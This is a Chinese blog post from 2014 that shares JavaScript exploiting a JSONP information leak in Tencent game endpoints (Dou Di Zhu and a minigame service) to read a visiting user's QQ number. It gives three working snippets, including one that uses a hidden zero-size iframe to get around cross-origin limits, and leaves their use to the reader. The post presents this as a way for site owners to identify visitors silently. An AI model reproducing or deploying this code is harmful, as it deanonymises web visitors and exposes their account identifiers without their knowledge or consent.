2014-06
22
腾讯斗地主漏洞:JS获取访客QQ号接口源代码
作者:桑三 日期:2014-06-22
现在有很多网站都实现了“使用QQ登录”的快捷登录方式,省去了用户注册的繁琐过程。然而大家都清楚,快捷登录时,腾讯并未返回给网站用户的QQ号码。导致网站站长只能给用户随机安排一个用户名了。近日,有网络高手爆料:腾讯斗地主漏洞:JS获取访客QQ号接口源代码,桑三博客今天就给大家分享下。
废话不多说,直接上贴源代码了!
XML/HTML代码
- <script>
- function aaa(obj){
- if(obj.uin != 0){
- alert("获取到QQ:"+obj.uin);
- }else{
- alert("未获取到QQ");
- }
- }
- </script>
- <script src="http://zf.huanle.qq.com/cgi-bin/hlddz_box/hlddz_silver_to_gold_box?callback=aaa"></script>
补充:
有朋友说不跨域,且看如下代码:
XML/HTML代码
- <script>
- window.qq276548160 = "<script>function aaa(obj){parent.qq(obj);}<\/script><script src='http://zf.huanle.qq.com/cgi-bin/hlddz_box/hlddz_silver_to_gold_box?callback=aaa'><\/script>";
- function qq(obj){
- if(obj.uin != 0){
- alert("获取到QQ:"+obj.uin);
- }else{
- alert("未获取到QQ");
- }
- }
- </script>
- <iframe src="javascript:parent.qq276548160;" scrolling="no" frameborder="0" style="width: 0px; height: 0px;"></iframe>
腾讯斗地主漏洞:JS获取访客QQ号接口源代码放出来了,具体怎么用,我就不多说了!
下面是一段之前可用的网页获取QQ号码JSONP代码,可惜已经封了,这里也给大家分享下。
XML/HTML代码
- <!DOCTYPE html>
- <html>
- <head>
- <title>获取QQ</title>
- </head>
- <body>
- <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
- <script type="text/javascript">
- function jC(result) {
- for(var i in result) {
- if(i=="uin"){
- alert(result[i]);//循环输出a:1,b:2,etc.
- }
- }
- }
- var JSONP=document.createElement("script");
- JSONP.type="text/javascript";
- JSONP.src="http://dir.minigame.qq.com/cgi-bin/yxs/GetYxsRegTime?callback=jC";
- document.getElementsByTagName("head")[0].appendChild(JSONP);
- </script>
- </body>
- </html>
上一篇: 快速备案专家告诉你网站备案的45个知识
下一篇: 无法删除文件,无法读源文件或磁盘的解决办法
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags: 代码 技术 
相关日志:
评论: 0 | 引用: 0 | 查看次数: -
发表评论